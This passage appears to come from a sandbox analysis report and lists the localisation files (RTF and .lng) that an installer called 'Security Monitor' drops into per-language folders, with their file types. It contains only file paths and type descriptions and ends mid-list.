C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-2ED8C.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-3C8V3.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-3OMSH.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-83836.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-8R2OU.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-C01RU.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-C89EE.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-COP25.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-DRVA7.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-FQ6TU.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-I58FN.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-LD8T8.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-OHTH3.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-QNI7K.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-S0RFR.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-SMG4L.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-UAL2I.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-17P65.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-22K7B.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-3UOOI.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-5GJ14.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-6TMEG.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-A3JKV.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-APR2S.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-BE6VF.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-C3UII.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-EEOAO.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-FJLB6.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-FUR3S.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-I4J31.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-JSQ9J.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-OUT44.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-QBCKO.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-REP42.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english.lng (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\360_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\AVG_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\Avast_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\Avira_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\Kaspersky_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\McAfee_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\eset_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-0TKBV.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-15VHB.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-1MP1O.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-23NC0.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-28S48.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-3AOBI.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-3KPPE.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-4HF6K.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-6OSFV.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-9EIGP.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-A6V3O.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-B0DQQ.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-BRSF4.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-D1SET.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-ES2GI.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-HEV7O.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-JFQFP.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-LPGDL.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-LS4VV.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-NFVA8.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-OG1P0.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-Q2FFE.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-QDPS0.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-QTVMT.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-VU4N3.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\norton_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-2V9JN.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-448BV.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-A6IR7.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-DMK36.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-DU2DM.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-HDSBU.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-HIGLM.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-J9UP2.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-LE9H8.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-LU94I.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-N3OJT.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-PA0O2.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-S04SM.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-T6N3C.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-U7TVQ.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-UMEI7.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-VLG3I.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\snapshot.rtf (copy)
